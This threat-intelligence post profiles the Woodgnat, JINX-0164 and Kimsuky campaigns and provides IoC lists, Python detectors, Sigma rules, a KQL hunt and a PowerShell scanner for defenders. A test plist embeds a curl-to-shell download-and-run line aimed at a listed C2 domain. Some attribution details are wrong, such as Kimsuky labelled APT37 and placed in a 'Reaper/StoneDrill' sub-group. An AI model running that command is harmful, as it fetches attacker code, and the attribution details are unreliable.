
Woodgnat IAB & Kimsuky Campaigns: Mistic Backdoor, JINX-0164 macOS RATs, and LOTS Abuse Analysis

Security Arsenal Team
June 29, 2026

Current OTX Pulse data reveals a convergence of sophisticated threat operations leveraging trusted infrastructure and social engineering to establish footholds across multiple sectors.

  • Woodgnat (IAB): Associated with major ransomware cartels (Qilin, Black Basta), this actor is deploying a new stealthy backdoor, Mistic, and ModeloRAT. The campaign heavily utilizes DLL sideloading and targets the Insurance, Education, and Technology sectors to facilitate initial access.
  • JINX-0164: A financially motivated actor actively targeting cryptocurrency and software development organizations. They employ LinkedIn social engineering and supply chain attacks via compromised npm packages to deliver macOS-specific payloads (AUDIOFIX, MINIRAT).
  • Kimsuky (APT37): The North Korean state-sponsored group continues to evolve KimJongRAT by abusing GitHub repositories (Living Off The Trusted Sites - LOTS) and deploying MeshAgent for persistence, primarily targeting entities in Japan.

Collectively, these pulses indicate a shift toward abusing legitimate developer tools (npm, GitHub) and communication platforms (LinkedIn) to bypass traditional email security defenses.

Threat Actor / Malware Profile

Woodgnat / Mistic & ModeloRAT

  • Actor Type: Initial Access Broker (IAB) linked to Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta.
  • Distribution: Phishing emails delivering packages that rely on DLL sideloading to run the payload.
  • Behavior: Mistic is a stealthy backdoor providing remote access. ModeloRAT is utilized for data theft and reconnaissance.
  • Persistence: Likely achieved via sideloading malicious DLLs alongside legitimate applications.
  • C2 Communication: Connects to domains such as authorized-logins.net, grande-luna.top, and human-check.top.

JINX-0164 / AUDIOFIX & MINIRAT

  • Actor Type: Financially motivated cybercrime.
  • Distribution: LinkedIn phishing (recruiter persona) and malicious npm packages (supply chain).
  • Behavior:
    • AUDIOFIX: Python-based infostealer and RAT targeting macOS.
    • MINIRAT: Lightweight Go-based backdoor for macOS.
  • Persistence: Uses macOS persistence mechanisms (LaunchAgents/Profiles).
  • C2 Communication: Communicates with infrastructure like driver-updater.net, live.ong, and teamicrosoft.com (typosquatting).
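The LaunchAgents persistence noted above can be checked with a small plist inspector. This is an added example, not code from the post or from any JINX-0164 analysis: it takes the three JINX-0164 domains listed on this page, and the remaining checks (programs in temporary paths, a shell one-liner that pipes a curl download into an interpreter, RunAtLoad) are generic heuristics assumed for the example. The two plists it inspects are constructed, as are the label names and the application path in them.

```python
import plistlib
from pathlib import Path
from urllib.parse import urlparse

# Domains the page attributes to JINX-0164. The temp-path and download-and-run
# heuristics below are assumptions added for this example, not behaviour the
# page attributes to the actor.
JINX_DOMAINS = ("driver-updater.net", "live.ong", "teamicrosoft.com")
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
INTERPRETERS = ("sh", "bash", "zsh", "python", "python3", "osascript")


def hostnames_in(arg):
    """Hostnames of URL-looking words inside one argument string."""
    hosts = []
    for word in arg.split():
        word = word.strip("'\"();,")
        if "://" in word:
            host = urlparse(word).hostname
            if host:
                hosts.append(host.lower())
    return hosts


def matches_ioc(host):
    """Exact or parent-domain match against the JINX-0164 list."""
    return any(host == d or host.endswith("." + d) for d in JINX_DOMAINS)


def assess_launch_agent(plist_bytes):
    """Return reasons a LaunchAgent/LaunchDaemon plist looks suspicious.

    An empty list means no check fired; it is not proof the agent is benign.
    """
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception:  # malformed XML or binary plist (expat / plistlib errors)
        return ["plist does not parse"]

    args = [a for a in (plist.get("ProgramArguments") or []) if isinstance(a, str)]
    if isinstance(plist.get("Program"), str):
        args.insert(0, plist["Program"])

    reasons = []
    for arg in args:
        for host in hostnames_in(arg):
            if matches_ioc(host):
                reasons.append(f"references JINX-0164 infrastructure: {host}")
        if arg.startswith(TEMP_PREFIXES):
            reasons.append(f"program in a temporary path: {arg}")

    # 'sh -c "curl ... | sh"' style launchers: an interpreter as the program and
    # a download piped into another interpreter inside the arguments.
    joined = " ".join(args)
    if args and args[0].rsplit("/", 1)[-1] in INTERPRETERS and "curl" in joined and "|" in joined:
        reasons.append("shell one-liner that pipes a download into an interpreter")

    if reasons and plist.get("RunAtLoad"):
        reasons.append("RunAtLoad is set, so this executes at every login")
    return reasons


def scan_launch_agents(directory):
    """Assess every *.plist under a LaunchAgents/LaunchDaemons directory."""
    return {str(p): assess_launch_agent(p.read_bytes()) for p in Path(directory).glob("*.plist")}


# Constructed samples (not captured artefacts); the hostile one mirrors the
# install.sh download-and-run flow described on the page.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.constructed.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL https://driver-updater.net/install.sh | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.constructed.helper</string>
  <key>Program</key><string>/Applications/Constructed.app/Contents/MacOS/helper</string>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, data in (("suspicious", SUSPICIOUS_PLIST), ("benign", BENIGN_PLIST)):
        print(name, assess_launch_agent(data) or ["no findings"])
```

On a live host, `scan_launch_agents(Path.home() / "Library/LaunchAgents")` and the `/Library/LaunchAgents` and `/Library/LaunchDaemons` directories are the places to point it at; configuration profiles, the other persistence route named above, are not plists in these directories and need a separate check.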

Kimsuky / KimJongRAT & MeshAgent

  • Actor Type: North Korean APT (Reaper/StoneDrill sub-group).
  • Distribution: Phishing emails containing shortened URLs redirecting to GitHub Releases.
  • Behavior: KimJongRAT combines info-stealing with RDP capabilities. MeshAgent provides remote control.
  • Persistence: Scheduled tasks and installation of MeshAgent services.
  • C2 Communication: Uses corpsecs.com and servequake.com for payload delivery and C2.

IOC Analysis

The provided indicators of compromise (IOCs) span multiple vectors, requiring a multi-layered defensive approach:

  • Domains & Hostnames: A mix of typosquatted domains (teamicrosoft.com), dynamic DNS (servequake.com), and suspicious TLD usage (.top). SOC teams should immediately add these to DNS sinkholes and firewall block lists.
  • IP Addresses: Include 89.36.224.5 and 104.200.67.46. These should be blocked at the perimeter.
  • File Hashes (SHA256): Specific hashes for the Mistic backdoor, macOS loaders, and KimJongRAT variants are available. EDR solutions should be configured to hunt for these specific hashes.
  • URLs: Direct download links for shell scripts (install.sh) and GitHub repositories. Web proxies should log and alert on access to these specific paths.

Operationalization: Use SIEM correlation rules to match network connections (Zeek/Bro logs, Firewall logs) against the domain and IP lists. Hunt for file hashes via EDR telemetry or PowerShell scanning scripts.
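As an added example (not from the Security Arsenal post or the OTX pulses), the correlation step above can be exercised offline against Zeek JSON logs before the rule goes into a SIEM. The script carries the page's domains and IPs, attributes hits to actors the way the page's KQL hunt does, and matches domains label by label so that a hostname under a listed domain is flagged while an unrelated name that merely contains a listed string is not. The log records and the internal addresses in them are constructed.

```python
import json

# IoC domains and IPs as listed on this page; actor attribution mirrors the
# grouping in the Threat Actor / Malware Profile section.
IOC_DOMAINS = {
    "authorized-logins.net": "Woodgnat",
    "grande-luna.top": "Woodgnat",
    "human-check.top": "Woodgnat",
    "driver-updater.net": "JINX-0164",
    "teamicrosoft.com": "JINX-0164",
    "live.ong": "JINX-0164",
    "corpsecs.com": "Kimsuky",
    "servequake.com": "Kimsuky",
}
IOC_IPS = {"89.36.224.5", "104.200.67.46"}  # the page does not attribute these to an actor


def match_domain(name):
    """Return the actor for an exact or parent-domain match, else None.

    Label-aware: 'googleoba.servequake.com' matches 'servequake.com', but
    'notcorpsecs.com' does not match 'corpsecs.com' (a substring test would).
    """
    labels = name.rstrip(".").lower().split(".")
    for i in range(len(labels)):
        actor = IOC_DOMAINS.get(".".join(labels[i:]))
        if actor:
            return actor
    return None


def scan_zeek_json(lines):
    """Correlate Zeek JSON-format dns.log / conn.log records against the IoC lists.

    Each hit records the timestamp, source host, matched indicator, record type
    and attributed actor ("unattributed" for bare IP hits).
    """
    hits = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        rec = json.loads(raw)
        base = {"ts": rec.get("ts"), "src": rec.get("id.orig_h")}
        query = rec.get("query")  # present only in dns.log records
        if query:
            actor = match_domain(query)
            if actor:
                hits.append({**base, "kind": "dns", "indicator": query, "actor": actor})
        dst = rec.get("id.resp_h")
        if dst in IOC_IPS:
            hits.append({**base, "kind": "conn", "indicator": dst, "actor": "unattributed"})
    return hits


# Constructed sample records (not real telemetry): three dns.log and two conn.log lines.
# 203.0.113.10 is a documentation-range address standing in for a benign destination.
SAMPLE_LOG = """
{"ts": 1782000000.1, "id.orig_h": "10.0.0.21", "id.resp_h": "10.0.0.2", "query": "googleoba.servequake.com"}
{"ts": 1782000001.2, "id.orig_h": "10.0.0.22", "id.resp_h": "10.0.0.2", "query": "notcorpsecs.com"}
{"ts": 1782000002.3, "id.orig_h": "10.0.0.23", "id.resp_h": "89.36.224.5", "id.resp_p": 443}
{"ts": 1782000003.4, "id.orig_h": "10.0.0.24", "id.resp_h": "203.0.113.10", "id.resp_p": 443}
{"ts": 1782000004.5, "id.orig_h": "10.0.0.25", "id.resp_h": "10.0.0.2", "query": "TeamIcrosoft.com."}
"""

if __name__ == "__main__":
    for hit in scan_zeek_json(SAMPLE_LOG.splitlines()):
        print(hit)
```

Because the page identifies servequake.com as dynamic DNS, the parent-domain match will also flag unrelated hostnames registered under that provider; if that noise matters, narrow the Kimsuky entry to the specific host the KQL hunt names (googleoba.servequake.com).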

Detection Engineering

yaml
---
title: Potential Woodgnat Mistic Backdoor C2 Activity
id: d2f1b8c5-6a7e-4b8c-9d1e-3f5a7b6c8d9e
description: Detects network connections to known Woodgnat C2 infrastructure associated with Mistic Backdoor and ModeloRAT.
status: experimental
date: 2026/06/29
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6756a1c89b5d4b1c8a7d9e0f
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains:
            - 'authorized-logins.net'
            - 'grande-luna.top'
            - 'human-check.top'
            - 'update-fall.com'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - c2
    - backdoor
    - apt
    - woodgnat
---
title: Potential JINX-0164 macOS Infrastructure Access
id: e3a2c9d6-7b8f-4c9d-8e2f-4a6b8c7d9e0f  # placeholder UUID v4; assign your own rule id
description: Detects DNS queries or network connections to domains used by JINX-0164 for macOS malware delivery.
status: experimental
date: 2026/06/29
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6758a2d90c6e5c2d9b8e0f1a
logsource:
    category: dns
    product: zeek
detection:
    selection:
        query|contains:
            - 'driver-updater.net'
            - 'live.us.org'
            - 'teamicrosoft.com'
            - 'live.ong'
    condition: selection
falsepositives:
    - Legitimate typos (unlikely for these specific domains)
level: high
tags:
    - dns
    - osx
    - trojan
    - jinx-0164
---
title: Kimsuky KimJongRAT LOTS Activity via GitHub
id: f4b3d0e7-8c0a-4d0e-9f3a-5b7c9d0e1f2a  # placeholder UUID v4; assign your own rule id
description: Detects processes reaching out to suspicious domains used by Kimsuky for GitHub abuse and MeshAgent C2.
status: experimental
date: 2026/06/29
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6759b3e11d7f6d3e0c9f1g2b
logsource:
    category: network_connection
    product: linux
detection:
    selection:
        DestinationHostname|endswith:
            - 'corpsecs.com'
            - 'servequake.com'
    condition: selection
falsepositives:
    - Rare
level: critical
tags:
    - c2
    - apt
    - kimsuky
    - lateral-movement


kql
// Hunt for Woodgnat, JINX-0164, and Kimsuky Network Indicators
// Table: DeviceNetworkEvents (Microsoft Sentinel)
let IOC_Domains = dynamic([
    'authorized-logins.net', 'mueleer.com', 'grande-luna.top', 
    'driver-updater.net', 'teamicrosoft.com', 'live.ong',
    'googleoba.servequake.com', 'corpsecs.com'
]);
let IOC_IPs = dynamic([
    '89.36.224.5', '104.200.67.46'
]);
DeviceNetworkEvents
| where RemoteUrl has_any (IOC_Domains) or RemoteIP in (IOC_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| extend ThreatActor = case(
    RemoteUrl has 'authorized-logins.net' or RemoteUrl has 'grande-luna.top', 'Woodgnat',
    RemoteUrl has 'driver-updater.net' or RemoteUrl has 'teamicrosoft.com', 'JINX-0164',
    RemoteUrl has 'servequake.com' or RemoteUrl has 'corpsecs.com', 'Kimsuky',
    'Unknown'
)


powershell
# IOC Hunt Script for Woodgnat, JINX-0164 (Windows artifacts if any), and Kimsuky
# Requires Administrative Privileges

Write-Host "[*] Starting Hunt for Woodgnat/Kimsuky Persistence and IOCs..." -ForegroundColor Cyan

# 1. Check for suspicious File Hashes (Simulated paths or user provided directories)
$TargetHashes = @(
    "3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be", # Woodgnat Mistic
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17", # JINX-0164
    "9758e76b601798a30d903bf05052a53df80451e5c156548ce9da828f608b6470", # Kimsuky KimJongRAT
    "221a39856b37e3c682f62427f1e6b965b36a2405764689c914672770a01a1fa9"  # Kimsuky MeshAgent
)

$SearchPaths = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp\")

foreach ($Path in $SearchPaths) {
    if (Test-Path $Path) {
        Write-Host "[*] Scanning $Path..." -ForegroundColor Yellow
        # -File keeps directories out of Get-FileHash; -contains is case-insensitive, so the hash case does not matter
        Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue | Get-FileHash -Algorithm SHA256 -ErrorAction SilentlyContinue | Where-Object { $TargetHashes -contains $_.Hash } | ForEach-Object {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.Path) | Hash: $($_.Hash)" -ForegroundColor Red
        }
    }
}

# 2. Check for suspicious Registry Persistence (Run Keys)
Write-Host "[*] Checking Registry Run Keys for suspicious entries..." -ForegroundColor Yellow
$RunKeys = @(
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
)

# Name fragments to flag in Run-key values; tune this list for your environment
$suspiciousNames = @("update", "loader", "mints", "agent", "mesh")

foreach ($Key in $RunKeys) {
    if (Test-Path $Key) {
        $Props = Get-ItemProperty -Path $Key -ErrorAction SilentlyContinue
        if ($Props) {
            # Enumerate the value names directly and skip the PS* metadata properties Get-ItemProperty adds
            $Props.PSObject.Properties | Where-Object { $_.Name -notlike "PS*" } | ForEach-Object {
                $PropName  = $_.Name
                $PropValue = [string]$_.Value
                if ($suspiciousNames | Where-Object { $PropValue -like "*$_*" }) {
                    Write-Host "[!] Suspicious Persistence: $Key | Property: $PropName | Value: $PropValue" -ForegroundColor Red
                }
            }
        }
    }
}

Write-Host "[*] Hunt Complete." -ForegroundColor Green

Response Priorities

Immediate (0-4 hours)

  • Block IOCs: Immediately block all listed domains, IP addresses, and URLs at the network perimeter (Firewall, Proxy, DNS Sinkhole).
  • Hunt for Compromise: Execute the provided PowerShell script across endpoints to locate dropped malicious files associated with Mistic, KimJongRAT, or Windows components of JINX-0164.
  • Isolate Infected Hosts: If any file hashes match, isolate the affected endpoint from the network immediately.

24 Hours

  • Credential Verification: Given the presence of credential stealers (Mistic, AUDIOFIX) and IAB activity, force a password reset for accounts that may have been accessed from infected endpoints, particularly targeting admin credentials and developer accounts.
  • Log Analysis: Review proxy and firewall logs for egress connections to the specific C2 domains (*.top, corpsecs.com, live.ong) over the past 30 days.

1 Week

  • Supply Chain Hardening: Audit npm and GitHub repository usage. Implement policies to prevent the download of packages from unverified or newly created repositories.
  • Application Control: Implement strict allow-listing for binaries to prevent sideloading techniques used by Woodgnat (e.g., only allow signed Microsoft DLLs to load from system directories).
  • Security Awareness: Brief employees, specifically HR and Development teams, on the LinkedIn recruitment scams used by JINX-0164 and the phishing techniques used by Kimsuky.
